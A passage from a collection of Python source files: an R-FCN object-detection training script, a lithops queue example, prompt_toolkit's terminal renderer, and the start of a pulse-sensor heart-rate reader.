        ('--imdb', dict(dest='imdb_name', help='dataset to train on',
                        default='voc_2007_trainval', type=str)),
        ('--imdb_test', dict(dest='imdb_test_name', help='dataset to test',
                             default='voc_2007_test', type=str)),
        ('--set', dict(dest='set_cfgs', help='set config keys',
                       default=None, nargs=argparse.REMAINDER)),
        ('--model', dict(dest='model_name', help='folder name of model',
                         default=None, type=str)),
    ]
    for flag, kwargs in option_specs:
        parser.add_argument(flag, **kwargs)

    # Bare invocation: show the help text and bail out.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    return parser.parse_args()
def get_roidb(imdb_name, rpn_file=None):
    """Load a dataset and build its training roidb.

    :param imdb_name: registered imdb name, e.g. 'voc_2007_trainval'.
    :param rpn_file: optional path to pre-computed RPN proposals; when given
        it is stored on the imdb config so the 'rpn' proposal method finds it.
    :returns: ``(roidb, imdb)`` tuple.
    """
    imdb = get_imdb(imdb_name)
    # Single-argument print() is identical under Python 2 and 3; the rest of
    # this file already mixes both styles, so normalize on the portable one.
    print('Loaded dataset `{:s}` for training'.format(imdb.name))
    imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
    print('Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD))
    if rpn_file is not None:
        imdb.config['rpn_file'] = rpn_file
    roidb = get_training_roidb(imdb)
    return roidb, imdb
def get_solvers(imdb_name, net_name, model_name):
    """Return ``(solver_paths, max_iters)`` for each R-FCN training stage.

    COCO datasets use the five-stage 360k/480k alternating-optimization
    schedule; everything else uses the two-stage 80k/120k OHEM schedule.

    :param imdb_name: dataset name (COCO detection via 'coco' prefix).
    :param net_name: network folder name, e.g. 'ResNet-101'.
    :param model_name: model sub-folder containing the solver prototxts.
    """
    if imdb_name.startswith('coco'):
        # Five-stage alternating optimization (RPN / R-FCN interleaved).
        stage_files = ['stage1_rpn_solver360k480k.pt',
                       'stage1_rfcn_ohem_solver360k480k.pt',
                       'stage2_rpn_solver360k480k.pt',
                       'stage2_rfcn_ohem_solver360k480k.pt',
                       'stage3_rpn_solver360k480k.pt']
        solvers = [os.path.join('.', 'models', 'coco',
                                net_name, model_name, f)
                   for f in stage_files]
        # Iterations for each training stage
        max_iters = [480000] * 5
        # NOTE: the original code also built an (unused) rpn_test.pt path
        # here; it was dead code and has been removed.
    else:
        # Two-stage R-FCN (mask, OHEM) schedule for PASCAL-style datasets.
        stage_files = ['stage1_rfcn_mask_ohem_solver80k120k.pt',
                       'stage2_rfcn_mask_ohem_solver80k120k.pt']
        solvers = [os.path.join(cfg.MODELS_DIR, net_name, model_name, f)
                   for f in stage_files]
        # Iterations for each training stage
        max_iters = [120000, 120000]
    return solvers, max_iters
def _init_caffe(cfg):
    """Initialize pycaffe in a training process.

    :param cfg: fast_rcnn configuration object; reads RNG_SEED and GPU_ID.
    """
    # caffe is imported locally rather than at module level; presumably so
    # the GPU context is created inside the training subprocess, not the
    # parent -- NOTE(review): confirm.
    import caffe
    # fix the random seeds (numpy and caffe) for reproducibility
    np.random.seed(cfg.RNG_SEED)
    caffe.set_random_seed(cfg.RNG_SEED)
    # set up caffe
    caffe.set_mode_gpu()
    caffe.set_device(cfg.GPU_ID)
def train_rfcn(queue=None, imdb_name=None, init_model=None, solver=None,
               max_iters=None, cfg=None, rpn_file=None, output_cache=None,
               model_name=None):
    """Train a R-FCN using proposals generated by an RPN.

    Intended to run as the target of a ``multiprocessing.Process``; the
    path of the final caffemodel is sent back to the parent via ``queue``.

    :param queue: multiprocessing queue used to report the model path.
    :param imdb_name: dataset to train on.
    :param init_model: caffemodel used to initialize network weights.
    :param solver: path to this stage's solver prototxt.
    :param max_iters: number of SGD iterations to run.
    :param cfg: fast_rcnn config object (mutated in-place below).
    :param rpn_file: pickle of pre-computed RPN proposals.
    :param output_cache: filename for the cached final caffemodel.
    :param model_name: model folder name under the hard-coded models dir.
    """
    cfg.TRAIN.HAS_RPN = False           # not generating proposals on-the-fly
    cfg.TRAIN.PROPOSAL_METHOD = 'rpn'   # use pre-computed RPN proposals instead
    cfg.TRAIN.IMS_PER_BATCH = 1
    print('Init model: {}'.format(init_model))
    print('RPN proposals: {}'.format(rpn_file))
    print('Using config:')
    pprint.pprint(cfg)

    import caffe
    _init_caffe(cfg)

    roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
    output_dir = get_output_dir(imdb)
    print('Output will be saved to `{:s}`'.format(output_dir))
    # Train R-FCN.
    # HACK: the cache location is hard-coded to one machine's layout and
    # deliberately overrides get_output_dir(); parameterize before reuse.
    # (The dead os.path.join(output_dir, output_cache) assignment and the
    # unused `j` counter from the original have been removed.)
    final_caffemodel = ('/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' +
                       model_name + '/' + output_cache)
    if os.path.exists(final_caffemodel):
        # A finished model from a previous run exists -- skip training and
        # just report it.
        queue.put({'model_path': final_caffemodel})
    else:
        model_paths = train_net(solver, roidb, output_dir,
                                pretrained_model=init_model,
                                max_iters=max_iters,
                                model_name=model_name)
        # Cleanup all but the final model
        for snapshot in model_paths[:-1]:
            os.remove(snapshot)
        rfcn_model_path = model_paths[-1]
        # Send final model path through the multiprocessing queue
        shutil.copyfile(rfcn_model_path, final_caffemodel)
        queue.put({'model_path': final_caffemodel})
if __name__ == '__main__':
    args = parse_args()

    print('Called with args:')
    print(args)

    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id

    # --------------------------------------------------------------------------
    # Pycaffe doesn't reliably free GPU memory when instantiated nets are
    # discarded (e.g. "del net" in Python code). To work around this issue, each
    # training stage is executed in a separate process using
    # multiprocessing.Process.
    # --------------------------------------------------------------------------

    # queue for communicated results between processes
    mp_queue = mp.Queue()
    # solvers, iters, etc. for each training stage
    solvers, max_iters = get_solvers(args.imdb_name, args.net_name,
                                     args.model_name)

    banner = '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print(banner)
    print('Stage 0 RPN, compute normalization means and stds')
    print(banner)
    # Pre-computed RPN bbox-target normalization statistics per dataset.
    if args.imdb_name == 'voc_2007_trainval':
        cfg.TRAIN.RPN_NORMALIZE_MEANS = [0.00013977, 0.00940836, -0.02203678, -0.03512152]
        cfg.TRAIN.RPN_NORMALIZE_STDS = [0.11800866, 0.12171428, 0.33160738, 0.43583021]
    else:
        cfg.TRAIN.RPN_NORMALIZE_MEANS = [0.0002916, 0.01012382, -0.00680352, -0.02723215]
        cfg.TRAIN.RPN_NORMALIZE_STDS = [0.15335663, 0.12662337, 0.35018575, 0.45649545]

    print(banner)
    print('Stage 1 R-FCN using RPN proposals, init from ImageNet model')
    print(banner)
    # HACK: pretrained weights and proposal paths are hard-coded to one
    # machine's layout and silently override the --weights argument.
    args.pretrained_model = "/net/wujial/py-R-FCN/data/imagenet_models/ResNet-50-model.caffemodel"
    print('using lilac')
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    print(solvers[0])
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[0],
        max_iters=max_iters[0],
        cfg=cfg,
        rpn_file='/net/wujial/py-R-FCN/output/rfcn_alt_opt_5step_ohem/voc_2007_trainval/stage1_rpn_final_proposals.pkl',
        output_cache='stage1_mask_rfcn_final.caffemodel',
        model_name=args.model_name)
    p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
    p.start()
    rfcn_stage1_out = mp_queue.get()

    print(banner)
    print('Stage 2 R-FCN using RPN proposals, init from ImageNet model')
    print(banner)
    p.join()
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    # BUG FIX: log the stage-2 solver; the original printed solvers[0] here.
    print(solvers[1])
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model='/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + args.model_name + '/stage1_mask_rfcn_final.caffemodel',
        solver=solvers[1],
        max_iters=max_iters[1],
        cfg=cfg,
        rpn_file='/net/wujial/py-R-FCN/output/rfcn_alt_opt_5step_ohem/voc_2007_trainval/stage1_rpn_final_proposals.pkl',
        output_cache='stage2_mask_rfcn_final.caffemodel',
        model_name=args.model_name)
    p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
    p.start()
    rfcn_stage2_out = mp_queue.get()
    p.join()
|
queue_poll.py | import time
from lithops.multiprocessing import Process, Queue, current_process
def f(q):
    """Producer run in a worker process.

    Pushes a greeting list first, then three timestamped messages spaced
    one second apart, printing 'Done' when finished.
    """
    pid = current_process().pid
    print("I'm process {}".format(pid))
    q.put([42, None, 'hello'])
    msg_no = 0
    while msg_no < 3:
        q.put('Message no. {} ({})'.format(msg_no, time.time()))
        time.sleep(1)
        msg_no += 1
    print('Done')
if __name__ == '__main__':
    # Spawn the producer and consume until it goes quiet.
    q = Queue()
    p = Process(target=f, args=(q,))
    p.start()
    print(q.get()) # prints "[42, None, 'hello']"
    # A 3-second timeout without a message is treated as end-of-stream.
    consuming = True
    while consuming:
        try:
            res = q.get(block=True, timeout=3)
            print(res)
        # NOTE(review): `q.Empty` assumes the lithops Queue instance exposes
        # the Empty exception as an attribute; the stdlib equivalent lives in
        # the `queue` module, not on the queue object -- confirm against the
        # lithops.multiprocessing API.
        except q.Empty as e:
            print('Queue empty!')
            consuming = False
    p.join()
|
renderer.py | """
Renders the command line on the console.
(Redraws parts of the input line that were changed.)
"""
from __future__ import unicode_literals
from prompt_toolkit.eventloop import Future, From, ensure_future, get_event_loop
from prompt_toolkit.filters import to_filter
from prompt_toolkit.formatted_text import to_formatted_text
from prompt_toolkit.input.base import Input
from prompt_toolkit.layout.mouse_handlers import MouseHandlers
from prompt_toolkit.layout.screen import Point, Screen, WritePosition
from prompt_toolkit.output import Output, ColorDepth
from prompt_toolkit.styles import BaseStyle, DummyStyleTransformation, StyleTransformation
from prompt_toolkit.utils import is_windows
from collections import deque
from six.moves import range
import time
import threading
__all__ = [
'Renderer',
'print_formatted_text',
]
def _output_screen_diff(app, output, screen, current_pos, color_depth,
                        previous_screen=None, last_style=None, is_done=False,
                        full_screen=False, attrs_for_style_string=None,
                        size=None, previous_width=0): # XXX: drop is_done
    """
    Render the diff between this screen and the previous screen.

    This takes two `Screen` instances. The one that represents the output like
    it was during the last rendering and one that represents the current
    output raster. Looking at these two `Screen` instances, this function will
    render the difference by calling the appropriate methods of the `Output`
    object that only paint the changes to the terminal.

    This is some performance-critical code which is heavily optimized.
    Don't change things without profiling first.

    :param current_pos: Current cursor position.
    :param last_style: The style string, used for drawing the last drawn
        character.  (Color/attributes.)
    :param attrs_for_style_string: :class:`._StyleStringToAttrsCache` instance.
    :param size: The current size of the terminal (columns/rows).
    :param previous_width: The width of the terminal during the last rendering.
    :returns: ``(current_pos, last_style)`` to feed into the next call.
    """
    width, height = size.columns, size.rows
    #: Remember the last printed character.
    last_style = [last_style] # nonlocal
    #: Variable for capturing the output.
    write = output.write
    write_raw = output.write_raw
    # Create locals for the most used output methods.
    # (Save expensive attribute lookups.)
    _output_set_attributes = output.set_attributes
    _output_reset_attributes = output.reset_attributes
    _output_cursor_forward = output.cursor_forward
    _output_cursor_up = output.cursor_up
    _output_cursor_backward = output.cursor_backward
    # Hide cursor before rendering. (Avoid flickering.)
    output.hide_cursor()
    def reset_attributes():
        " Wrapper around Output.reset_attributes. "
        _output_reset_attributes()
        last_style[0] = None  # Forget last char after resetting attributes.
    def move_cursor(new):
        " Move cursor to this `new` point. Returns the given Point. "
        current_x, current_y = current_pos.x, current_pos.y
        if new.y > current_y:
            # Use newlines instead of CURSOR_DOWN, because this might add new lines.
            # CURSOR_DOWN will never create new lines at the bottom.
            # Also reset attributes, otherwise the newline could draw a
            # background color.
            reset_attributes()
            write('\r\n' * (new.y - current_y))
            current_x = 0
            _output_cursor_forward(new.x)
            return new
        elif new.y < current_y:
            _output_cursor_up(current_y - new.y)
        if current_x >= width - 1:
            write('\r')
            _output_cursor_forward(new.x)
        elif new.x < current_x or current_x >= width - 1:
            _output_cursor_backward(current_x - new.x)
        elif new.x > current_x:
            _output_cursor_forward(new.x - current_x)
        return new
    def output_char(char):
        """
        Write the output of this character.
        """
        # If the last printed character has the same style, don't output the
        # style again.
        the_last_style = last_style[0]  # Either `None` or a style string.
        if the_last_style == char.style:
            write(char.char)
        else:
            # Look up `Attr` for this style string. Only set attributes if different.
            # (Two style strings can still have the same formatting.)
            # Note that an empty style string can have formatting that needs to
            # be applied, because of style transformations.
            new_attrs = attrs_for_style_string[char.style]
            if not the_last_style or new_attrs != attrs_for_style_string[the_last_style]:
                _output_set_attributes(new_attrs, color_depth)
            write(char.char)
            last_style[0] = char.style
    # Render for the first time: reset styling.
    if not previous_screen:
        reset_attributes()
    # Disable autowrap. (When entering the alternate screen, or anytime when
    # we have a prompt. - In the case of a REPL, like IPython, people can have
    # background threads, and it's hard for debugging if their output is not
    # wrapped.)
    if not previous_screen or not full_screen:
        output.disable_autowrap()
    # When the previous screen has a different size, redraw everything anyway.
    # Also when we are done. (We might take up less rows, so clearing is important.)
    if is_done or not previous_screen or previous_width != width:  # XXX: also consider height??
        current_pos = move_cursor(Point(x=0, y=0))
        reset_attributes()
        output.erase_down()
        previous_screen = Screen()
    # Get height of the screen.
    # (height changes as we loop over data_buffer, so remember the current value.)
    # (Also make sure to clip the height to the size of the output.)
    current_height = min(screen.height, height)
    # Loop over the rows.
    row_count = min(max(screen.height, previous_screen.height), height)
    c = 0  # Column counter.
    for y in range(row_count):
        new_row = screen.data_buffer[y]
        previous_row = previous_screen.data_buffer[y]
        zero_width_escapes_row = screen.zero_width_escapes[y]
        new_max_line_len = min(width - 1, max(new_row.keys()) if new_row else 0)
        previous_max_line_len = min(width - 1, max(previous_row.keys()) if previous_row else 0)
        # Loop over the columns.
        c = 0
        while c < new_max_line_len + 1:
            new_char = new_row[c]
            old_char = previous_row[c]
            # Treat zero-width characters as taking one column here.
            char_width = (new_char.width or 1)
            # When the old and new character at this position are different,
            # draw the output. (Because of the performance, we don't call
            # `Char.__ne__`, but inline the same expression.)
            if new_char.char != old_char.char or new_char.style != old_char.style:
                current_pos = move_cursor(Point(x=c, y=y))
                # Send injected escape sequences to output.
                if c in zero_width_escapes_row:
                    write_raw(zero_width_escapes_row[c])
                output_char(new_char)
                current_pos = Point(x=current_pos.x + char_width, y=current_pos.y)
            c += char_width
        # If the new line is shorter, trim it.
        if previous_screen and new_max_line_len < previous_max_line_len:
            current_pos = move_cursor(Point(x=new_max_line_len + 1, y=y))
            reset_attributes()
            output.erase_end_of_line()
    # Correctly reserve vertical space as required by the layout.
    # When this is a new screen (drawn for the first time), or for some reason
    # higher than the previous one. Move the cursor once to the bottom of the
    # output. That way, we're sure that the terminal scrolls up, even when the
    # lower lines of the canvas just contain whitespace.
    # The most obvious reason that we actually want this behaviour is the avoid
    # the artifact of the input scrolling when the completion menu is shown.
    # (If the scrolling is actually wanted, the layout can still be built in a
    # way to behave that way by setting a dynamic height.)
    if current_height > previous_screen.height:
        current_pos = move_cursor(Point(x=0, y=current_height - 1))
    # Move cursor:
    if is_done:
        current_pos = move_cursor(Point(x=0, y=current_height))
        output.erase_down()
    else:
        current_pos = move_cursor(
            screen.get_cursor_position(app.layout.current_window))
    if is_done or not full_screen:
        output.enable_autowrap()
    # Always reset the color attributes. This is important because a background
    # thread could print data to stdout and we want that to be displayed in the
    # default colors. (Also, if a background color has been set, many terminals
    # give weird artifacts on resize events.)
    reset_attributes()
    if screen.show_cursor or is_done:
        output.show_cursor()
    return current_pos, last_style[0]
class HeightIsUnknownError(Exception):
    """Information unavailable. Did not yet receive the CPR response."""
class _StyleStringToAttrsCache(dict):
    """
    Dict subclass that lazily maps style strings to :class:`.Attr`.

    A miss computes the attributes once (style lookup followed by the active
    style transformation) and memoizes the result. (This is an important
    speed up.)
    """
    def __init__(self, get_attrs_for_style_str, style_transformation):
        assert callable(get_attrs_for_style_str)
        assert isinstance(style_transformation, StyleTransformation)

        self.get_attrs_for_style_str = get_attrs_for_style_str
        self.style_transformation = style_transformation

    def __missing__(self, style_str):
        # Compute, transform, then memoize -- later lookups hit the dict.
        transformed = self.style_transformation.transform_attrs(
            self.get_attrs_for_style_str(style_str))
        self[style_str] = transformed
        return transformed
class CPR_Support(object):
    """Tri-state enum: whether or not the terminal supports CPR requests."""
    SUPPORTED = 'SUPPORTED'
    NOT_SUPPORTED = 'NOT_SUPPORTED'
    UNKNOWN = 'UNKNOWN'
class Renderer(object):
    """
    Renders an application's layout to the terminal, painting only the diff
    against the previously rendered screen.

    Typical usage:

    ::

        output = Vt100_Output.from_pty(sys.stdout)
        r = Renderer(style, output)
        r.render(app, layout=...)
    """
    CPR_TIMEOUT = 2  # Time to wait until we consider CPR to be not supported.
    def __init__(self, style, output, input, full_screen=False,
                 mouse_support=False, cpr_not_supported_callback=None):
        """
        :param style: :class:`.BaseStyle` used for rendering.
        :param output: :class:`.Output` to paint to.
        :param input: :class:`.Input`; consulted for CPR support.
        :param full_screen: When True, render using the alternate screen.
        :param mouse_support: Filter-like value (passed through `to_filter`);
            checked on every render to toggle mouse support.
        :param cpr_not_supported_callback: Optional callable, invoked (via the
            event loop) when the terminal turns out not to answer CPR.
        """
        assert isinstance(style, BaseStyle)
        assert isinstance(output, Output)
        assert isinstance(input, Input)
        assert callable(cpr_not_supported_callback) or cpr_not_supported_callback is None
        self.style = style
        self.output = output
        self.input = input
        self.full_screen = full_screen
        self.mouse_support = to_filter(mouse_support)
        self.cpr_not_supported_callback = cpr_not_supported_callback
        self._in_alternate_screen = False
        self._mouse_support_enabled = False
        self._bracketed_paste_enabled = False
        # Future set when we are waiting for a CPR flag.
        self._waiting_for_cpr_futures = deque()
        self.cpr_support = CPR_Support.UNKNOWN
        # If the input object can never respond to CPR, don't bother asking.
        if not input.responds_to_cpr:
            self.cpr_support = CPR_Support.NOT_SUPPORTED
        # Cache for the style.
        self._attrs_for_style = None
        self._last_style_hash = None
        self._last_transformation_hash = None
        self._last_color_depth = None
        self.reset(_scroll=True)
    def reset(self, _scroll=False, leave_alternate_screen=True):
        """
        Forget the previously rendered screen and restore the terminal modes
        (mouse support, bracketed paste, alternate screen) to their defaults.
        """
        # Reset position
        self._cursor_pos = Point(x=0, y=0)
        # Remember the last screen instance between renderers. This way,
        # we can create a `diff` between two screens and only output the
        # difference. It's also to remember the last height. (To show for
        # instance a toolbar at the bottom position.)
        self._last_screen = None
        self._last_size = None
        self._last_style = None
        # Default MouseHandlers. (Just empty.)
        self.mouse_handlers = MouseHandlers()
        #: Space from the top of the layout, until the bottom of the terminal.
        #: We don't know this until a `report_absolute_cursor_row` call.
        self._min_available_height = 0
        # In case of Windows, also make sure to scroll to the current cursor
        # position. (Only when rendering the first time.)
        if is_windows() and _scroll:
            self.output.scroll_buffer_to_prompt()
        # Quit alternate screen.
        if self._in_alternate_screen and leave_alternate_screen:
            self.output.quit_alternate_screen()
            self._in_alternate_screen = False
        # Disable mouse support.
        if self._mouse_support_enabled:
            self.output.disable_mouse_support()
            self._mouse_support_enabled = False
        # Disable bracketed paste.
        if self._bracketed_paste_enabled:
            self.output.disable_bracketed_paste()
            self._bracketed_paste_enabled = False
        # Flush output. `disable_mouse_support` needs to write to stdout.
        self.output.flush()
    @property
    def last_rendered_screen(self):
        """
        The `Screen` class that was generated during the last rendering.
        This can be `None`.
        """
        return self._last_screen
    @property
    def height_is_known(self):
        """
        True when the height from the cursor until the bottom of the terminal
        is known. (It's often nicer to draw bottom toolbars only if the height
        is known, in order to avoid flickering when the CPR response arrives.)
        """
        return self.full_screen or self._min_available_height > 0 or \
            is_windows()  # On Windows, we don't have to wait for a CPR.
    @property
    def rows_above_layout(self):
        """
        Return the number of rows visible in the terminal above the layout.
        """
        if self._in_alternate_screen:
            return 0
        elif self._min_available_height > 0:
            total_rows = self.output.get_size().rows
            last_screen_height = self._last_screen.height if self._last_screen else 0
            return total_rows - max(self._min_available_height, last_screen_height)
        else:
            raise HeightIsUnknownError('Rows above layout is unknown.')
    def request_absolute_cursor_position(self):
        """
        Get current cursor position.

        We do this to calculate the minimum available height that we can
        consume for rendering the prompt. This is the available space below the
        cursor.

        For vt100: Do CPR request. (answer will arrive later.)
        For win32: Do API call. (Answer comes immediately.)
        """
        # Only do this request when the cursor is at the top row. (after a
        # clear or reset). We will rely on that in `report_absolute_cursor_row`.
        assert self._cursor_pos.y == 0
        # In full-screen mode, always use the total height as min-available-height.
        if self.full_screen:
            self._min_available_height = self.output.get_size().rows
        # For Win32, we have an API call to get the number of rows below the
        # cursor.
        elif is_windows():
            self._min_available_height = self.output.get_rows_below_cursor_position()
        # Use CPR.
        else:
            if self.cpr_support == CPR_Support.NOT_SUPPORTED:
                return
            def do_cpr():
                # Asks for a cursor position report (CPR).
                self._waiting_for_cpr_futures.append(Future())
                self.output.ask_for_cpr()
            if self.cpr_support == CPR_Support.SUPPORTED:
                do_cpr()
            # If we don't know whether CPR is supported, only do a request if
            # none is pending, and test it, using a timer.
            elif self.cpr_support == CPR_Support.UNKNOWN and not self.waiting_for_cpr:
                do_cpr()
                def timer():
                    time.sleep(self.CPR_TIMEOUT)
                    # Not set in the meantime -> not supported.
                    if self.cpr_support == CPR_Support.UNKNOWN:
                        self.cpr_support = CPR_Support.NOT_SUPPORTED
                        if self.cpr_not_supported_callback:
                            # Make sure to call this callback in the main thread.
                            get_event_loop().call_from_executor(self.cpr_not_supported_callback)
                t = threading.Thread(target=timer)
                t.daemon = True
                t.start()
    def report_absolute_cursor_row(self, row):
        """
        To be called when we know the absolute cursor position.
        (As an answer of a "Cursor Position Request" response.)
        """
        # Receiving any response proves the terminal supports CPR.
        self.cpr_support = CPR_Support.SUPPORTED
        # Calculate the amount of rows from the cursor position until the
        # bottom of the terminal.
        total_rows = self.output.get_size().rows
        rows_below_cursor = total_rows - row + 1
        # Set the minimum available height.
        self._min_available_height = rows_below_cursor
        # Pop and set waiting for CPR future.
        try:
            f = self._waiting_for_cpr_futures.popleft()
        except IndexError:
            pass  # Received CPR response without having a CPR.
        else:
            f.set_result(None)
    @property
    def waiting_for_cpr(self):
        """
        Waiting for CPR flag. True when we sent the request, but didn't get a
        response.
        """
        return bool(self._waiting_for_cpr_futures)
    def wait_for_cpr_responses(self, timeout=1):
        """
        Wait for a CPR response.
        """
        cpr_futures = list(self._waiting_for_cpr_futures)  # Make copy.
        # When there are no CPRs in the queue. Don't do anything.
        if not cpr_futures or self.cpr_support == CPR_Support.NOT_SUPPORTED:
            return Future.succeed(None)
        f = Future()
        # When a CPR has been received, set the result.
        def wait_for_responses():
            for response_f in cpr_futures:
                yield From(response_f)
            if not f.done():
                f.set_result(None)
        ensure_future(wait_for_responses())
        # Timeout.
        def wait_for_timeout():
            time.sleep(timeout)
            # Got timeout.
            if not f.done():
                self._waiting_for_cpr_futures = deque()
                f.set_result(None)
        t = threading.Thread(target=wait_for_timeout)
        t.daemon = True
        t.start()
        return f
    def render(self, app, layout, is_done=False):
        """
        Render the current interface to the output.
        :param is_done: When True, put the cursor at the end of the interface. We
                won't print any changes to this part.
        """
        output = self.output
        # Enter alternate screen.
        if self.full_screen and not self._in_alternate_screen:
            self._in_alternate_screen = True
            output.enter_alternate_screen()
        # Enable bracketed paste.
        if not self._bracketed_paste_enabled:
            self.output.enable_bracketed_paste()
            self._bracketed_paste_enabled = True
        # Enable/disable mouse support.
        needs_mouse_support = self.mouse_support()
        if needs_mouse_support and not self._mouse_support_enabled:
            output.enable_mouse_support()
            self._mouse_support_enabled = True
        elif not needs_mouse_support and self._mouse_support_enabled:
            output.disable_mouse_support()
            self._mouse_support_enabled = False
        # Create screen and write layout to it.
        size = output.get_size()
        screen = Screen()
        screen.show_cursor = False  # Hide cursor by default, unless one of the
                                    # containers decides to display it.
        mouse_handlers = MouseHandlers()
        # Calculate height.
        if self.full_screen:
            height = size.rows
        elif is_done:
            # When we are done, we don't necessarily want to fill up until the bottom.
            height = layout.container.preferred_height(size.columns, size.rows).preferred
        else:
            last_height = self._last_screen.height if self._last_screen else 0
            height = max(self._min_available_height,
                         last_height,
                         layout.container.preferred_height(size.columns, size.rows).preferred)
        height = min(height, size.rows)
        # When the size changes, don't consider the previous screen.
        if self._last_size != size:
            self._last_screen = None
        # When we render using another style or another color depth, do a full
        # repaint. (Forget about the previous rendered screen.)
        # (But note that we still use _last_screen to calculate the height.)
        if (self.style.invalidation_hash() != self._last_style_hash or
                app.style_transformation.invalidation_hash() != self._last_transformation_hash or
                app.color_depth != self._last_color_depth):
            self._last_screen = None
            self._attrs_for_style = None
        if self._attrs_for_style is None:
            self._attrs_for_style = _StyleStringToAttrsCache(
                self.style.get_attrs_for_style_str,
                app.style_transformation)
        self._last_style_hash = self.style.invalidation_hash()
        self._last_transformation_hash = app.style_transformation.invalidation_hash()
        self._last_color_depth = app.color_depth
        layout.container.write_to_screen(screen, mouse_handlers, WritePosition(
            xpos=0,
            ypos=0,
            width=size.columns,
            height=height,
        ), parent_style='', erase_bg=False, z_index=None)
        screen.draw_all_floats()
        # When grayed. Replace all styles in the new screen.
        if app.exit_style:
            screen.append_style_to_content(app.exit_style)
        # Process diff and write to output.
        self._cursor_pos, self._last_style = _output_screen_diff(
            app, output, screen, self._cursor_pos, app.color_depth,
            self._last_screen, self._last_style, is_done,
            full_screen=self.full_screen,
            attrs_for_style_string=self._attrs_for_style, size=size,
            previous_width=(self._last_size.columns if self._last_size else 0))
        self._last_screen = screen
        self._last_size = size
        self.mouse_handlers = mouse_handlers
        output.flush()
        # Set visible windows in layout.
        app.layout.visible_windows = screen.visible_windows
        if is_done:
            self.reset()
    def erase(self, leave_alternate_screen=True):
        """
        Hide all output and put the cursor back at the first line. This is for
        instance used for running a system command (while hiding the CLI) and
        later resuming the same CLI.)
        :param leave_alternate_screen: When True, and when inside an alternate
                screen buffer, quit the alternate screen.
        """
        output = self.output
        output.cursor_backward(self._cursor_pos.x)
        output.cursor_up(self._cursor_pos.y)
        output.erase_down()
        output.reset_attributes()
        output.enable_autowrap()
        output.flush()
        self.reset(leave_alternate_screen=leave_alternate_screen)
    def clear(self):
        """
        Clear screen and go to 0,0
        """
        # Erase current output first.
        self.erase()
        # Send "Erase Screen" command and go to (0, 0).
        output = self.output
        output.erase_screen()
        output.cursor_goto(0, 0)
        output.flush()
        self.request_absolute_cursor_position()
def print_formatted_text(
        output, formatted_text, style, style_transformation=None,
        color_depth=None):
    """
    Print a sequence of (style_str, text) tuples to the given output,
    rendered with the given style.

    :param output: an `Output` instance to write to.
    :param formatted_text: anything accepted by `to_formatted_text`.
    :param style: a `BaseStyle` used to resolve style strings.
    :param style_transformation: optional `StyleTransformation`.
    :param color_depth: optional `ColorDepth`; defaults to the terminal's.
    """
    assert isinstance(output, Output)
    assert isinstance(style, BaseStyle)
    assert style_transformation is None or isinstance(style_transformation, StyleTransformation)
    assert color_depth is None or color_depth in ColorDepth._ALL

    fragments = to_formatted_text(formatted_text)
    transformation = style_transformation or DummyStyleTransformation()
    depth = color_depth or ColorDepth.default()

    # Start from a clean terminal state.
    output.reset_attributes()
    output.enable_autowrap()

    # Resolve style strings through a cache, then emit each fragment.
    attrs_cache = _StyleStringToAttrsCache(
        style.get_attrs_for_style_str,
        transformation)

    for style_str, text in fragments:
        fragment_attrs = attrs_cache[style_str]
        if fragment_attrs:
            output.set_attributes(fragment_attrs, depth)
        else:
            output.reset_attributes()

        # The output is assumed to be in raw mode, so a carriage return has
        # to precede every newline (also matters for telnet front-ends).
        assert '\r' not in text
        output.write(text.replace('\n', '\r\n'))

    # Leave the terminal in a clean state again.
    output.reset_attributes()
    output.flush()
|
main.py | # extended from https://github.com/WorldFamousElectronics/PulseSensor_Amped_Arduino
import time
import threading
import board
import busio
i2c = busio.I2C(board.SCL, board.SDA)
import adafruit_ads1x15.ads1015 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
class Pulsesensor:
    """Reads a pulse sensor through an ADS1015 I2C ADC and estimates BPM.

    Port of the WorldFamousElectronics PulseSensor_Amped Arduino algorithm.
    The current reading is exposed through the ``BPM`` attribute (0 means
    no heartbeat detected).
    """

    def __init__(self, channel=0, bus=0, device=0):
        # `bus` and `device` are kept for backward compatibility with the
        # earlier MCP3008 (SPI) interface; the ADS1015 is addressed via I2C.
        self.channel = channel
        self.BPM = 0
        self.thread = None          # background sampling thread, if running
        self.ads = ADS.ADS1015(i2c)
        self.chan = AnalogIn(self.ads, ADS.P0)

    def getBPMLoop(self):
        """Continuously sample the sensor and update ``self.BPM``.

        Runs until ``self.thread.stopped`` becomes True.  All timing is in
        milliseconds; IBI is the inter-beat interval.
        """
        rate = [0] * 10              # last 10 IBI values
        sampleCounter = 0            # elapsed ms, used to determine pulse timing
        lastBeatTime = 0             # sampleCounter value at the last beat
        P = 512                      # running peak of the pulse wave (seeded)
        T = 512                      # running trough of the pulse wave (seeded)
        thresh = 500                 # instantaneous beat threshold (seeded)
        amp = 100                    # pulse waveform amplitude (seeded)
        firstBeat = True             # used to seed `rate` for a sane startup BPM
        secondBeat = False
        IBI = 600                    # ms between beats; must be seeded
        Pulse = False                # True while a live beat is being detected
        lastTime = int(time.time() * 1000)

        while not self.thread.stopped:
            Signal = self.chan.value
            currentTime = int(time.time() * 1000)
            sampleCounter += currentTime - lastTime
            lastTime = currentTime
            N = sampleCounter - lastBeatTime

            # Track peak and trough of the pulse wave; wait 3/5 of the last
            # IBI before accepting a trough, to avoid dichrotic noise.
            if Signal < thresh and N > (IBI / 5.0) * 3:
                if Signal < T:
                    T = Signal
            if Signal > thresh and Signal > P:
                P = Signal

            # The signal surges up in value on every heartbeat.
